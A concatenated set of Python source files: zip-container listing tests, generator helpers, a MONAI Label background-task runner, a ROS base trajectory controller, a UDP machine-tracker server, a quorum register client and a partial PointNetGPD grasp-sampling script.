        ['{}//{}///'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                            NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
         NotADirectoryError],
        # list a non_exist_dir but share the surfix
        ['{}/'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"][:-1]),
         FileNotFoundError]
    ])
    def test_list_with_errors(self, path_or_prefix, error):
        """Bad paths raise the same error recursively and non-recursively."""
        with self.fs_handler.open_as_container(self.zip_file_name) as handler:
            with self.assertRaises(error):
                list(handler.list(path_or_prefix))
            with self.assertRaises(error):
                list(handler.list(path_or_prefix, recursive=True))

    @parameterized.expand([
        # path ends with slash
        ['{}//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]), True],
        # not normalized path
        ['{}//{}'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                         NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
         False],
        ['{}//..//{}/{}'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                                NO_DIRECTORY_FILENAME_LIST["dir2_name"],
                                NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
         False],
        # problem 2 in issue #66
        [NO_DIRECTORY_FILENAME_LIST["dir1_name"], True],
        # not normalized path
        ['{}//{}//../'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"],
                              NO_DIRECTORY_FILENAME_LIST["testfile1_name"]),
         True],
        # not normalized path root
        ['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]), False],
        # not normalized path beyond root
        ['//..//', False],
        # not normalized path beyond root
        ['{}//..//'.format(NO_DIRECTORY_FILENAME_LIST["dir1_name"]), False],
        # starting with slash
        ['/', False]
    ])
    def test_isdir(self, path_or_prefix, expected):
        """``isdir`` is True for implicit directories despite the archive
        containing no explicit directory entries."""
        with self.fs_handler.open_as_container(self.zip_file_name) as handler:
            self.assertEqual(handler.isdir(path_or_prefix),
                             expected)

    @parameterized.expand([
        ["does_not_exist"],
        ["does_not_exist/"],
        ["does/not/exist"]
    ])
    def test_isdir_not_exist(self, dir):
        """``isdir`` is False for paths absent from the archive."""
        with self.fs_handler.open_as_container(self.zip_file_name) as handler:
            self.assertFalse(handler.isdir(dir))
|
generator_utils.py
|
# Copyright (c) 2020 mingruimingrui
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the MIT-style license found in the
# LICENSE file in the root directory of this source tree.
"""Helper functions to work with generators"""
import time
import queue
import threading
from typing import Iterable, Generator
def chunk(g: Iterable, size=10000):
    """Formats output of iterable into chunks of equal sizes

    Arguments:
        g {Iterable} -- An iterable preferrably a generator

    Keyword Arguments:
        size {int} -- The size of each chunk (default: {10000})

    Yields:
        List[object] -- A list of items from `g`; every chunk has exactly
        `size` items except possibly the final one.
    """
    # The accumulator used to be named `chunk`, shadowing this function's
    # own name inside its body — renamed to avoid confusion.
    buf = []
    for item in g:
        buf.append(item)
        if len(buf) >= size:
            yield buf
            buf = []
    # Flush the final, possibly short, chunk.
    if buf:
        yield buf
def prefetch(g: Iterable, size=1) -> Generator:
    """Prefetch wrapper around a generator/iterable

    Arguments:
        g {Iterable} -- An iterable preferably a generator

    Keyword Arguments:
        size {int} -- The size of the prefetch queue (default: {1})

    Yields:
        object -- items from `g`
    """
    coord = {'done': False}
    prefetch_queue = queue.Queue(size)

    def fill_prefetch_queue():
        for item in g:
            # Retry with a timeout so the worker can notice shutdown
            # (coord['done']) even while the queue stays full.
            while not coord['done']:
                try:
                    prefetch_queue.put(item, block=True, timeout=0.1)
                except queue.Full:
                    continue
                else:
                    break
            if coord['done']:
                break

        # Wait for prefetch_queue to be completely consumed before
        # signalling completion to the consumer loop below.
        while prefetch_queue.qsize() > 0:
            time.sleep(0.1)
        coord['done'] = True

    worker = threading.Thread(target=fill_prefetch_queue)
    # Thread.setDaemon() is deprecated (Python 3.10+); assign the
    # `daemon` attribute directly instead.
    worker.daemon = True
    worker.start()

    while not coord['done']:
        try:
            item = prefetch_queue.get(block=True, timeout=0.1)
        except queue.Empty:
            continue
        else:
            yield item
    worker.join()
|
async_tasks.py
|
import functools
import json
import logging
import os
import os.path
import platform
import subprocess
import uuid
from collections import deque
from datetime import datetime
from threading import Thread
from typing import Dict
import psutil
from monailabel.config import settings
logger = logging.getLogger(__name__)
background_tasks: Dict = {}
background_processes: Dict = {}
def _task_func(task, method):
    """Run one background task to completion, streaming its output.

    Launches the per-platform app-runner script as a subprocess, records
    the live process in ``background_processes[method]``, tails its stdout
    into ``task["details"]`` and finalizes the task status.
    """
    base_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
    # Pick the platform-specific wrapper script (Windows .bat vs POSIX .sh);
    # prefer the absolute path when the scripts directory is present.
    script = "run_monailabel_app.bat" if any(platform.win32_ver()) else "run_monailabel_app.sh"
    if os.path.exists(os.path.realpath(os.path.join(base_dir, "scripts", script))):
        script = os.path.realpath(os.path.join(base_dir, "scripts", script))
    cmd = [
        script,
        settings.APP_DIR,
        settings.STUDIES,
        method,
        json.dumps(task["request"]),
    ]
    logger.info(f"COMMAND:: {' '.join(cmd)}")
    # stderr is folded into stdout so a single reader sees everything.
    process = subprocess.Popen(
        cmd,
        stderr=subprocess.STDOUT,
        stdout=subprocess.PIPE,
        universal_newlines=True,
        env=os.environ.copy(),
    )
    task_id = task["id"]
    background_processes[method][task_id] = process
    task["status"] = "RUNNING"
    # Keep only the last 20 output lines to bound memory for chatty tasks.
    task["details"] = deque(maxlen=20)
    plogger = logging.getLogger(f"task_{method}")
    while process.poll() is None:
        line = process.stdout.readline()
        line = line.rstrip()
        if line:
            plogger.info(line)
            task["details"].append(line)
    logger.info("Return code: {}".format(process.returncode))
    background_processes[method].pop(task_id, None)
    process.stdout.close()
    task["end_ts"] = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
    # A task stopped via stop_background_task() is already marked STOPPED;
    # only tasks still RUNNING are resolved to DONE/ERROR here.
    if task["status"] == "RUNNING":
        task["status"] = "DONE" if process.returncode == 0 else "ERROR"
def run_background_task(request, method, debug=False):
    """Register a task record for *method* and launch it.

    With ``debug=True`` the task runs synchronously in this process;
    otherwise it runs on a freshly started thread. Returns the record.
    """
    task = {
        "id": uuid.uuid4(),
        "status": "SUBMITTED",
        "request": request,
        "start_ts": datetime.today().strftime("%Y-%m-%d %H:%M:%S"),
    }

    # Lazily create the per-method registries on first use.
    background_tasks.setdefault(method, [])
    background_processes.setdefault(method, dict())
    background_tasks[method].append(task)

    if debug:
        _task_func(task, method)
    else:
        worker = Thread(target=functools.partial(_task_func, task, method))
        worker.start()
    return task
def stop_background_task(method):
    """Terminate the currently running background task for *method*.

    Kills the whole child process tree (grandchildren first, via psutil,
    so nothing is reparented and left running), removes the process from
    the registry and marks the matching task record STOPPED.
    Returns the updated task record, or None when nothing is running.
    """
    logger.info(f"Kill background task for {method}")
    if not background_tasks.get(method) or not background_processes.get(method):
        return None
    # Only one process per method is tracked; take the first entry.
    task_id, process = next(iter(background_processes[method].items()))
    children = psutil.Process(pid=process.pid).children(recursive=True)
    for child in children:
        logger.info(f"Kill:: Child pid is {child.pid}")
        child.kill()
    logger.info(f"Kill:: Process pid is {process.pid}")
    process.kill()
    background_processes[method].pop(task_id, None)
    logger.info(f"Killed background process: {process.pid}")
    # Mark STOPPED now so _task_func does not overwrite the status with
    # DONE/ERROR when it notices the subprocess has exited.
    task = [task for task in background_tasks[method] if task["id"] == task_id][0]
    task["status"] = "STOPPED"
    task["end_ts"] = datetime.today().strftime("%Y-%m-%d %H:%M:%S")
    return task
def tasks(method):
    """
    Returns List of all task ids
    """
    try:
        return background_tasks[method]
    except KeyError:
        return []
def processes(method):
    """
    Returns Dict of all task id => process
    """
    try:
        return background_processes[method]
    except KeyError:
        return dict()
def run_main():
    """CLI entry point: parse arguments, configure logging, and run a
    single task synchronously in the foreground."""
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument("-a", "--app", required=True)
    parser.add_argument("-s", "--studies", required=True)
    parser.add_argument("-m", "--method", default="info")
    parser.add_argument("-r", "--request", default="{}")
    parser.add_argument("-d", "--debug", action="store_true")
    args = parser.parse_args()

    # Normalize paths and publish them through the global settings object
    # that _task_func reads.
    args.app = os.path.realpath(args.app)
    args.studies = os.path.realpath(args.studies)
    settings.APP_DIR = args.app
    settings.STUDIES = args.studies

    logging.basicConfig(
        level=(logging.DEBUG if args.debug else logging.INFO),
        format="[%(asctime)s.%(msecs)03d][%(levelname)5s](%(name)s) - %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )
    # debug=True forces synchronous execution (no worker thread).
    run_background_task(json.loads(args.request), args.method, debug=True)
# Allow running this module directly as a CLI entry point.
if __name__ == "__main__":
    run_main()
|
base_trajectory_controller.py
|
from brett2.PR2 import PR2
#roslib.load_manifest("nav_msgs"); import nav_msgs.msg as nm
import trajectory_msgs.msg as tm
import numpy as np
from numpy import sin, cos
import rospy
import scipy.interpolate as si
from Queue import Queue, Empty
from threading import Thread
import jds_utils.conversions as conv
import kinematics.kinematics_utils as ku
from time import time, sleep
class Spline2D(object):
    """Vector-valued interpolating spline: one 1-D spline per column of y."""

    def __init__(self, x, y):
        # Fit an independent univariate spline to every output dimension.
        splines = []
        for ycol in y.T:
            splines.append(si.InterpolatedUnivariateSpline(x, ycol))
        self.Fs = splines

    def __call__(self, x, nu=0):
        # Evaluate (or differentiate, for nu > 0) every component spline
        # and stack the results back into the original column layout.
        values = [F(x, nu=nu) for F in self.Fs]
        return np.array(values).T
class TrajectoryController:
    """Receives JointTrajectory messages and hands each one to a control
    loop running on its own thread, preempting any loop in progress."""

    def __init__(self):
        self.brett = PR2()
        self.sub = rospy.Subscriber("base_traj_controller/command", tm.JointTrajectory, self.callback)
        self.q = Queue()
        self.F = None
        # Flags coordinating hand-over between listen_loop and control_loop.
        self.stop_requested = False
        self.ctrl_loop_running = False

    def callback(self, msg):
        # Convert the ROS trajectory into (waypoints, timestamps) arrays;
        # only the first three joint positions (x, y, theta) are kept.
        joints = []
        ts = []
        for jtp in msg.points:
            joints.append((jtp.positions[0], jtp.positions[1], jtp.positions[2]))
            ts.append(jtp.time_from_start.to_sec())
        self.q.put( (np.array(joints),np.array(ts)) )
        self.msg = msg

    def listen_loop(self):
        # Blocks forever: pop queued trajectories and spawn a control
        # thread for each, asking any running loop to stop first.
        while not rospy.is_shutdown():
            try:
                joints, ts = self.q.get(timeout=.01)
                if self.ctrl_loop_running: self.stop_requested = True
                while self.ctrl_loop_running: sleep(.001)
                ctrl_thread = Thread(target = self.control_loop, args=(joints, ts))
                ctrl_thread.start()
            except Empty:
                pass

    def control_loop(self,joints, ts):
        # Abstract: subclasses must override. A bare `raise` here simply
        # errors out if the base implementation is ever called.
        raise
class BaseTrajectoryController(TrajectoryController):
    """PD controller that drives the PR2 base along a received trajectory."""

    def control_loop(self,joints,ts):
        print "running control loop with new trajectory"
        # Spline through the waypoints so the target pose can be sampled
        # at an arbitrary elapsed time.
        F = Spline2D(ts, joints)
        t_start = time()
        duration = ts[-1]
        prev_err = None
        prev_time = None
        # PD gains for the commanded twist.
        kp = 1
        kd = .1
        use_relative = False
        frame_id = self.msg.header.frame_id
        if "base" in frame_id:
            # Trajectory is expressed relative to the base pose at start.
            use_relative = True
            pos_start = self.brett.base.get_pose("odom_combined")
        elif "odom_combined" in frame_id or "map" in frame_id:
            pass
        else:
            raise Exception("invalid frame %s for base traj"%frame_id)
        while True:
            if rospy.is_shutdown():
                return
            if self.stop_requested:
                # Preempted by a newer trajectory (see listen_loop).
                # NOTE(review): ctrl_loop_running is never set True in the
                # visible code, so this handshake may never fire — confirm.
                self.ctrl_loop_running = False
                rospy.loginfo("stop requested--leaving control loop")
                return
            t_elapsed = time() - t_start
            # NOTE(review): the log message says "+1sec" but the code
            # allows 5 s of settling past the end of the trajectory.
            if t_elapsed > duration+5:
                rospy.loginfo("time elapsed (+1sec)--leaving control loop")
                return
            else:
                if use_relative:
                    # invert transform from orig position
                    pos_cur = self.brett.base.get_pose("odom_combined")
                    pos_cur -= pos_start
                    a = pos_start[2]
                    pos_cur[:2] = np.array([[cos(a), sin(a)],[-sin(a), cos(a)]]).dot(pos_cur[:2])
                else:
                    pos_cur = self.brett.base.get_pose("odom_combined")
                # Past the end of the spline, hold the final waypoint.
                if t_elapsed > duration: pos_targ = joints[-1]
                else: pos_targ = F(t_elapsed, nu = 0)
                # Wrap the target heading to the nearest equivalent angle.
                pos_targ[2] = ku.closer_ang(pos_targ[2], pos_cur[2])
                err = (pos_targ - pos_cur)
                twist = kp*err
                if prev_err is not None: twist += kd*(err - prev_err)/(t_elapsed - prev_time)
                prev_err = err
                prev_time = t_elapsed
                # Rotate the world-frame twist into the robot frame.
                a = pos_cur[2]
                twist[0:2] = np.dot(
                    np.array([[np.cos(a), np.sin(a)],
                              [-np.sin(a), np.cos(a)]]) ,
                    twist[0:2])
                self.brett.base.set_twist(twist)
                # NOTE(review): pos_prev is assigned but never read.
                pos_prev = pos_cur
                sleep(.01)
# Stand-alone entry point: start the ROS node and block in listen_loop.
if __name__ == "__main__":
    import rospy
    rospy.init_node("base_traj_controller", disable_signals = True)
    controller = BaseTrajectoryController()
    controller.listen_loop()
|
server.py
|
#!/usr/bin/env python
'''
Machine tracker server. Waits for connections. Once connected
it will save the updates to locations.
'''
import networking as nt
import socket
import threading
def discovery_thread(client_list_lock, client_list, end_event):
    '''
    Wait for client discovery broadcasts until end_event is set.

    For each discovery request, create a client_manager for the sender
    unless one already exists with the same ip and port.  A client that
    reappears with a different port is assumed to have restarted: the
    old manager is shut down, removed, and a replacement is created.
    '''
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Allow receiving broadcast datagrams on this socket.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    broadcast_addr = nt.get_broadcast(nt.interface)
    s.bind((broadcast_addr, nt.r_port))
    # Short timeout so end_event is polled regularly instead of
    # blocking forever in recv().
    s.settimeout(2)
    while not end_event.isSet():
        try:
            data = s.recv(1500)
        except socket.timeout:
            data = ''
        if nt.is_client_discovery_request(data):
            client_ip, client_port = nt.known_msg_parse(data)
            client_dict = {'ip': client_ip, 'port': client_port}
            with client_list_lock:
                # Bug fix: iterate over a snapshot -- the original looped
                # over client_list while calling client_list.remove() on
                # it, which can skip entries during iteration.
                for client in list(client_list):
                    if client.ip() == client_ip:
                        if client.port() != client_port:
                            print("Client " + client_ip + " has a new port. Ending the old thread and starting a new one.")
                            client.end()
                            print('Old client manager thread joined.')
                            client_list.remove(client)
                            continue
                        else:
                            print('Client ' + client_ip + ' already in list.')
                            break
                else:  # only runs when the for loop did not break
                    print('Appending ' + client_ip + ' to client list')
                    new_client = client_manager(client_dict)
                    client_list.append(new_client)
    return
class client_manager():
    """
    Owns the sockets and worker threads used to talk to one discovered
    client: a tx thread that sends the discovery reply, and an rx
    thread that buffers location datagrams received from the client.
    """
    def ip(self):
        """Return the client's IP address."""
        return self.client_ip

    def port(self):
        """Return the client's discovery port."""
        return self.client_port

    def get_data(self):
        """Pop and return the oldest buffered datagram (FIFO order).

        Raises IndexError when no data has been buffered yet.
        """
        with self.data_lock:
            # Bug fix: the original read client_data[0] but popped the
            # *last* element, returning the oldest datagram while
            # silently discarding the newest one.
            data = self.client_data.pop(0)
        return data

    def end(self):
        """Tell the client to exit, stop both threads, close both sockets."""
        msg = nt.make_message(nt.server_msg['exit'], ())
        self.tx_socket.sendto(msg, self.tx_tuple)
        self.end_event.set()
        self.tx_thread.join()
        self.rx_thread.join()
        self.tx_socket.close()
        self.rx_socket.close()
        return

    def client_tx_thread(self):
        """Send one discovery reply (our rx endpoint and the update
        interval), then idle until shutdown is requested."""
        print('Tx thread started, sending to port ' + str(self.client_port))
        msg = nt.make_message(nt.server_msg['discovery_reply'], (nt.get_ip_address(nt.interface), self.rx_port, self.client_interval))
        self.tx_socket.sendto(msg, self.tx_tuple)
        self.end_event.wait()
        print('Tx thread ending')
        return

    def client_rx_thread(self):
        """Buffer datagrams from the client until shutdown is requested."""
        print('Rx thread started, listening on IP ' + self.rx_ip + ' ' + str(self.rx_port))
        while not self.end_event.is_set():
            # Timeout slightly above the update interval so the
            # shutdown flag is polled regularly.
            self.rx_socket.settimeout(self.client_interval + 1)
            try:
                data = self.rx_socket.recv(1500)
                print(data)
                with self.data_lock:
                    self.client_data.append(data)
            except socket.timeout:
                print('RX timeout')
        self.end_event.wait()
        print('Rx thread ending')
        return

    def __init__(self, client_dict):
        """Create tx/rx sockets and start the worker threads.

        client_dict must contain 'ip' and 'port' of the client.
        """
        self.client_interval = 1  # seconds between expected client updates
        self.end_event = threading.Event()
        self.client_ip = client_dict['ip']
        self.client_port = client_dict['port']
        self.data_lock = threading.RLock()
        self.client_data = []
        # Socket used to send to the client's UDP rx endpoint.
        self.tx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.tx_tuple = (self.client_ip, int(self.client_port))
        # Socket bound to a random local port; the client sends here.
        self.rx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.rx_socket.bind((nt.get_ip_address(nt.interface), 0))
        self.rx_ip, self.rx_port = self.rx_socket.getsockname()
        self.tx_thread = threading.Thread(target=self.client_tx_thread)
        self.rx_thread = threading.Thread(target=self.client_rx_thread)
        self.rx_thread.start()
        self.tx_thread.start()
        print("Client " + self.client_ip + " created.")
        return
def main():
    """Run the discovery thread until the operator presses Enter,
    then shut down every client manager."""
    # Figure out what interface to use - from the user
    client_list = []
    client_list_lock = threading.RLock()
    end_event = threading.Event()
    d_thread = threading.Thread(target=discovery_thread, args=(client_list_lock,client_list,end_event))
    d_thread.start()
    raw_input('Press Enter to quit')
    end_event.set()
    # Stop each client's threads; hold the lock so the discovery
    # thread cannot mutate the list concurrently.
    with client_list_lock:
        for client in client_list:
            client.end()
if __name__ == "__main__":
    debug=False
    # NOTE(review): network interface is hard-coded; adjust for the host.
    nt.interface = 'eth0'
    main()
|
ARclient.py
|
#!/bin/python3.6
# -*- coding: utf-8 -*-
#
# MIT License
#
# Copyright (c) 2018 Robert Gustafsson
# Copyright (c) 2018 Andreas Lindhé
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import configparser
import time
import threading
import math
import struct
import random as r
from threading import Thread
from channel.SenderChannel import SenderChannel
from atomic_register.QuorumSendAR import QuorumSend
from channel.ppProtocol import PingPongMessage
class Client:
    """
    Client side of a quorum-based atomic register.

    Spawns a daemon thread running an asyncio event loop with one
    SenderChannel per configured server node; reads and writes are
    performed as quorum phases (query, then write/inform).
    """
    def __init__(self, cfgfile):
        self.hw_addr = self.get_hwaddr()
        # Tag is (sequence number, unique client id); starts below any
        # tag a server can hold.
        self.uid = (-1, self.hw_addr)
        self.loop = asyncio.get_event_loop()
        config = configparser.ConfigParser()
        config.read(cfgfile)
        nbr_of_servers = int(config['General']['n'])
        # Majority quorum out of n servers.
        self.majority = math.ceil((nbr_of_servers + 1) / 2)
        quorum_size = self.majority
        self.p = QuorumSend(quorum_size, PingPongMessage)
        t = Thread(target=self.start_event_loop, args=(self.loop, config['Nodes']))
        t.daemon = True
        t.start()

    def get_hwaddr(self):
        """Return a MAC address identifying this client.

        Reads the loopback interface's address; when it is all zeros
        (the common case for `lo`), a random MAC-formatted id is
        generated instead.
        """
        with open('/sys/class/net/lo/address') as f:
            hw_addr = f.read().splitlines()[0]
        if hw_addr == '00:00:00:00:00:00':
            hw_addr = ':'.join(['%02x'] * 6) % tuple(
                r.randint(0, 255) for _ in range(6))
        return hw_addr

    def start_event_loop(self, loop, nodes):
        """Thread entry point: create one channel per configured node
        and run the event loop forever."""
        asyncio.set_event_loop(loop)
        for i, node in enumerate(nodes):
            ip, port = nodes[node].split(':')
            c = SenderChannel(i, self.hw_addr, 0, self.p, ip, port)
            asyncio.ensure_future(c.start())
            print("Create channel to {}:{}".format(ip, port))
        loop.run_forever()

    def qrmAccess(self, msg, opt_size=None):
        """Run one quorum phase on the event-loop thread and block for its result."""
        fut = asyncio.run_coroutine_threadsafe(self.p.phaseInit(msg, opt_size), self.loop)
        return fut.result()

    def write(self, msg):
        """Write msg: query a quorum for the max tag, then write msg
        with a strictly larger tag."""
        res = self.qrmAccess((None, None, 'qry', 'write'))
        try:
            max_tag = max(x.get_tag() for x in res)
        except Exception:
            # Bug fix: the original swallowed this exception and then
            # crashed on an undefined max_tag (NameError).  Log the
            # offending responses and propagate the real error.
            print(res)
            raise
        new_tag = (int(max_tag[0]) + 1, self.uid)
        self.qrmAccess((new_tag, msg, 'write', 'write'))

    def read(self):
        """Read: query a quorum for the max-tag record, inform a quorum
        of it, and return its data."""
        res = self.qrmAccess((None, None, 'qry', 'read'))
        max_tag = max(x.get_tag() for x in res)
        max_rec = [x for x in res if x.get_tag() == max_tag][0]
        self.qrmAccess((max_tag, max_rec.get_data(), 'inform', 'read'))
        return max_rec.get_data()
|
kinect2grasp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author : Hongzhuo Liang
# E-mail : liang@informatik.uni-hamburg.de
# Description:
# Date : 05/08/2018 6:04 PM
# File Name : kinect2grasp.py
import torch
import rospy
from sensor_msgs.msg import PointCloud2
from visualization_msgs.msg import MarkerArray
from visualization_msgs.msg import Marker
import tf
import moveit_commander
import numpy as np
import pointclouds
import voxelgrid
import pcl
from autolab_core import YamlConfig
from dexnet.grasping import RobotGripper
from dexnet.grasping import GpgGraspSamplerPcl
import os
from pyquaternion import Quaternion
import sys
from os import path
import time
from scipy.stats import mode
import multiprocessing as mp
try:
from gpd_grasp_msgs.msg import GraspConfig
from gpd_grasp_msgs.msg import GraspConfigList
except ImportError:
print("Please install grasp msgs from https://github.com/TAMS-Group/gpd_grasp_msgs in your ROS workspace")
exit()
try:
from mayavi import mlab
except ImportError:
print("Can not import mayavi")
mlab = None
sys.path.append(path.dirname(path.dirname(path.dirname(path.abspath("__file__")))))
sys.path.append(os.environ['HOME'] + "/code/PointNetGPD/PointNetGPD")
from main_test import test_network, model, args
import logging
logging.getLogger().setLevel(logging.FATAL)
# global config:
# Sampler configuration, gripper model and tunable parameters shared by
# the functions below.
yaml_config = YamlConfig(os.environ['HOME'] + "/code/PointNetGPD/dex-net/test/config.yaml")
gripper_name = 'robotiq_85'
gripper = RobotGripper.load(gripper_name, os.environ['HOME'] + "/code/PointNetGPD/dex-net/data/grippers")
ags = GpgGraspSamplerPcl(gripper, yaml_config)  # GPG grasp sampler used throughout
value_fc = 0.4  # friction coefficient written into yaml_config before sampling
num_grasps = 40  # total grasp candidates to sample
num_workers = 20  # worker processes when using_mp is set
max_num_samples = 150  # cap on sampler iterations
n_voxel = 500  # initial voxel-grid resolution for downsampling
minimal_points_send_to_point_net = 20  # grasps with fewer points are marked bad
marker_life_time = 8  # seconds rviz markers stay visible
show_bad_grasp = False
save_grasp_related_file = False
show_final_grasp = args.show_final_grasp
tray_grasp = args.tray_grasp
using_mp = args.using_mp
single_obj_testing = False  # if True, it will wait for input before get pointcloud
# number of points put into neural network, per trained model variant
if args.model_type == "100":  # minimal points send for training
    input_points_num = 500
elif args.model_type == "50":
    input_points_num = 750
elif args.model_type == "3class":
    input_points_num = 500
else:
    input_points_num = 0
def remove_table_points(points_voxel_, vis=False):
    """Remove sparse xy-columns from a voxelized cloud.

    Points whose (x, y) pair is shared by fewer than 3 points are
    treated as table-plane noise and dropped.

    :param points_voxel_: (N, 3) array of voxel-center points
    :param vis: when True, plot the original and filtered clouds with mayavi
    :return: filtered (M, 3) array, original point order preserved
    """
    # Vectorized replacement for the original O(n*m) double loop:
    # count how many points share each unique (x, y) pair and keep the
    # points belonging to pairs with at least 3 members.
    _, inverse, counts = np.unique(points_voxel_[:, 0:2], axis=0,
                                   return_inverse=True, return_counts=True)
    keep_mask = counts[inverse] >= 3
    new_points_voxel_ = points_voxel_[keep_mask]
    print("Success delete [[ {} ]] points from the table!".format(len(points_voxel_) - len(new_points_voxel_)))
    if vis:
        p = points_voxel_
        mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(1, 0, 0))
        p = new_points_voxel_
        mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(0, 0, 1))
        mlab.points3d(0, 0, 0, scale_factor=0.01, color=(0, 1, 0))  # plot 0 point
        mlab.show()
    return new_points_voxel_
def remove_white_pixel(msg, points_, vis=False):
    """Drop near-white points (r, g and b all >= 210) from points_.

    Colors are read from the original PointCloud2 message; indices in
    the message and in points_ are assumed to correspond.
    """
    cloud_rec = pointclouds.split_rgb_field(pointclouds.pointcloud2_to_array(msg))
    rgb_colors = np.vstack(
        [np.asarray(cloud_rec[c], dtype=np.uint32) for c in ('r', 'g', 'b')]).T
    # A point survives only when every channel is below the white threshold.
    ind_good_points_ = np.flatnonzero((rgb_colors < 210).all(axis=-1))
    new_points_ = points_[ind_good_points_]
    if vis:
        p = points_
        mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(1, 0, 0))
        p = new_points_
        mlab.points3d(p[:, 0], p[:, 1], p[:, 2], scale_factor=0.002, color=(0, 0, 1))
        mlab.points3d(0, 0, 0, scale_factor=0.01, color=(0, 1, 0))  # plot 0 point
        mlab.show()
    return new_points_
def get_voxel_fun(points_, n):
    """Voxelize points_ on an n x n x n grid and return the unique
    centers of the occupied voxels."""
    grid = voxelgrid.VoxelGrid(points_, n_x=n, n_y=n, n_z=n)
    grid.compute()
    occupied_centers = grid.voxel_centers[grid.voxel_n]
    return np.unique(occupied_centers, axis=0)
def cal_grasp(msg, cam_pos_):
    """Sample grasp candidates from a PointCloud2 message.

    Downsamples the cloud with a voxel grid, estimates surface normals
    (flipped to face the camera at cam_pos_), then runs the GPG sampler
    either single-threaded or across num_workers processes.

    Returns (grasps, downsampled_points, surface_normals).
    """
    points_ = pointclouds.pointcloud2_to_xyz_array(msg)
    points_ = points_.astype(np.float32)
    remove_white = False
    if remove_white:
        points_ = remove_white_pixel(msg, points_, vis=True)
    # begin voxel points
    n = n_voxel  # parameter related to voxel method
    # gpg improvements, highlights: flexible n parameter for voxelizing.
    points_voxel_ = get_voxel_fun(points_, n)
    if len(points_) < 2000:  # should be a parameter
        # Sparse cloud: refine the grid until the voxelized cloud keeps
        # nearly all of the original points.
        while len(points_voxel_) < len(points_)-15:
            points_voxel_ = get_voxel_fun(points_, n)
            n = n + 100
            rospy.loginfo("the voxel has {} points, we want get {} points".format(len(points_voxel_), len(points_)))
    rospy.loginfo("the voxel has {} points, we want get {} points".format(len(points_voxel_), len(points_)))
    points_ = points_voxel_
    remove_points = False
    if remove_points:
        points_ = remove_table_points(points_, vis=True)
    # Estimate surface normals on the downsampled cloud.
    point_cloud = pcl.PointCloud(points_)
    norm = point_cloud.make_NormalEstimation()
    norm.set_KSearch(30)  # critical parameter when calculating the norms
    normals = norm.compute()
    surface_normal = normals.to_array()
    surface_normal = surface_normal[:, 0:3]
    # Flip normals that point more than 90 degrees away from the camera.
    vector_p2cam = cam_pos_ - points_
    vector_p2cam = vector_p2cam / np.linalg.norm(vector_p2cam, axis=1).reshape(-1, 1)
    tmp = np.dot(vector_p2cam, surface_normal.T).diagonal()
    angel = np.arccos(np.clip(tmp, -1.0, 1.0))
    wrong_dir_norm = np.where(angel > np.pi * 0.5)[0]
    tmp = np.ones([len(angel), 3])
    tmp[wrong_dir_norm, :] = -1
    surface_normal = surface_normal * tmp
    select_point_above_table = 0.010
    # modify of gpg: make it as a parameter. avoid select points near the table.
    points_for_sample = points_[np.where(points_[:, 2] > select_point_above_table)[0]]
    if len(points_for_sample) == 0:
        rospy.loginfo("Can not seltect point, maybe the point cloud is too low?")
        return [], points_, surface_normal
    yaml_config['metrics']['robust_ferrari_canny']['friction_coef'] = value_fc
    if not using_mp:
        rospy.loginfo("Begin cal grasps using single thread, slow!")
        grasps_together_ = ags.sample_grasps(point_cloud, points_for_sample, surface_normal, num_grasps,
                                             max_num_samples=max_num_samples, show_final_grasp=show_final_grasp)
    else:
        # begin parallel grasp:
        rospy.loginfo("Begin cal grasps using parallel!")

        def grasp_task(num_grasps_, ags_, queue_):
            # Worker: sample a share of the grasps, push the result on the queue.
            ret = ags_.sample_grasps(point_cloud, points_for_sample, surface_normal, num_grasps_,
                                     max_num_samples=max_num_samples, show_final_grasp=show_final_grasp)
            queue_.put(ret)

        queue = mp.Queue()
        num_grasps_p_worker = int(num_grasps/num_workers)
        workers = [mp.Process(target=grasp_task, args=(num_grasps_p_worker, ags, queue)) for _ in range(num_workers)]
        [i.start() for i in workers]
        grasps_together_ = []
        # Collect one result batch per worker (queue.get() blocks).
        for i in range(num_workers):
            grasps_together_ = grasps_together_ + queue.get()
        rospy.loginfo("Finish mp processing!")
